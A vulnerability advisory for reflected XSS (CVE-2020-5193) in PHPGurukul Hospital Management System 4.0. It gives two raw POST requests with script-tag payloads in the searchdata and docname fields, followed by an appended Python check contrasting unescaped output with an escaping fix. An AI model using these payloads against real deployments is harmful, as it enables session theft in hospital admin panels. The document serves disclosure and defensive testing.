> # Exploit Title: Hospital Management System 4.0 Multiple Reflected XSS
> # Google Dork: N/A
> # Date: 1/2/2020
> # Exploit Author: FULLSHADE
> # Vendor Homepage: https://phpgurukul.com/
> # Software Link: https://phpgurukul.com/hospital-management-system-in-php/
> # Version: v4.0
> # Tested on: Windows
> # CVE : CVE-2020-5193
>
> ================ 1 - Cross Site Scripting (Reflected) ================
>
> POST /hospital/hospital/hms/admin/patient-search.php HTTP/1.1
> Host: 10.0.0.214
> User-Agent: Mozilla/5.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-US,en;q=0.5
> Accept-Encoding: gzip, deflate
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 74
> Origin: http://10.0.0.214
> DNT: 1
> Connection: close
> Referer: http://10.0.0.214/hospital/hospital/hms/admin/patient-search.php
> Cookie: PHPSESSID=g1mpom762nglpeptn51b4rg5h5
> Upgrade-Insecure-Requests: 1
>
> searchdata=%3Cscript%3Ealert%28%22xss+machine%22%29%3C%2Fscript%3E&search=
>
> ?searchdata parameter is vulnerable to reflected XSS in the search field
>
> ================ 2 - Cross Site Scripting (Reflected) ================
>
> POST /hospital/hospital/hms/admin/add-doctor.php HTTP/1.1
> Host: 10.0.0.214
> User-Agent: Mozilla/5.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-US,en;q=0.5
> Accept-Encoding: gzip, deflate
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 187
> Origin: http://10.0.0.214
> DNT: 1
> Connection: close
> Referer: http://10.0.0.214/hospital/hospital/hms/admin/add-doctor.php
> Cookie: PHPSESSID=g1mpom762nglpeptn51b4rg5h5
> Upgrade-Insecure-Requests: 1
>
> Doctorspecialization=123&docname=%3Cscript%3Ealert%28%22xss+machine%22%29%3C%2Fscript%3E&clinicaddress=123&docfees=123&doccontact=123&docemail=123%40gmail.com&npass=123&cfpass=123&submit=
>
> ?docname parameter is vulnerable to reflected XSS when managing and adding a new doctor
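Both findings come down to a form field being echoed into the page without output encoding. The Python below, added here and not part of the advisory or the PHP application, decodes the two quoted POST bodies, feeds the parameter through a hypothetical verbatim renderer (the reported behaviour) and through an HTML-encoding one (the fix, equivalent to `htmlspecialchars` with `ENT_QUOTES` in PHP), and gives a regression check that tells the two apart; `render_unescaped`, `render_escaped` and `reflects_raw` are constructed stand-ins, not code from the project.

```python
"""Regression check for reflected-parameter handling in the two pages
named in the advisory (patient-search.php / searchdata, add-doctor.php /
docname). The renderers below are stand-ins for the PHP pages."""
from html import escape
from urllib.parse import parse_qs

# Request bodies copied verbatim from sections 1 and 2 of the advisory.
SEARCH_BODY = "searchdata=%3Cscript%3Ealert%28%22xss+machine%22%29%3C%2Fscript%3E&search="
DOCTOR_BODY = ("Doctorspecialization=123&docname=%3Cscript%3Ealert%28%22xss+machine%22%29"
               "%3C%2Fscript%3E&clinicaddress=123&docfees=123&doccontact=123"
               "&docemail=123%40gmail.com&npass=123&cfpass=123&submit=")


def post_param(body: str, name: str) -> str:
    """URL-decode one field of an x-www-form-urlencoded body ('+' is a space)."""
    return parse_qs(body, keep_blank_values=True).get(name, [""])[0]


def render_unescaped(label: str, value: str) -> str:
    """Hypothetical page that echoes the field as-is: the behaviour reported."""
    return f"<p>{label}: {value}</p>"


def render_escaped(label: str, value: str) -> str:
    """Hardened variant: encode at the point of output, including quotes,
    so the value can only ever be text inside the <p>, never new markup."""
    return f"<p>{label}: {escape(value, quote=True)}</p>"


def reflects_raw(response_html: str, submitted: str) -> bool:
    """True when the submitted value lands in the response byte-for-byte.
    With a value containing '<', that means it is live markup."""
    return submitted in response_html


def audit(body: str, field: str, label: str) -> dict:
    """Run both renderers on one advisory body and report the outcome."""
    value = post_param(body, field)
    return {
        "field": field,
        "decoded": value,
        "vulnerable_before_fix": reflects_raw(render_unescaped(label, value), value),
        "vulnerable_after_fix": reflects_raw(render_escaped(label, value), value),
    }


if __name__ == "__main__":
    for body, field, label in ((SEARCH_BODY, "searchdata", "Results for"),
                               (DOCTOR_BODY, "docname", "Doctor")):
        print(audit(body, field, label))
```

Run against the real application, the same check would be performed by submitting each body and testing whether the decoded value appears unchanged in the response; after the fix, only the `&lt;script&gt;` form should be present.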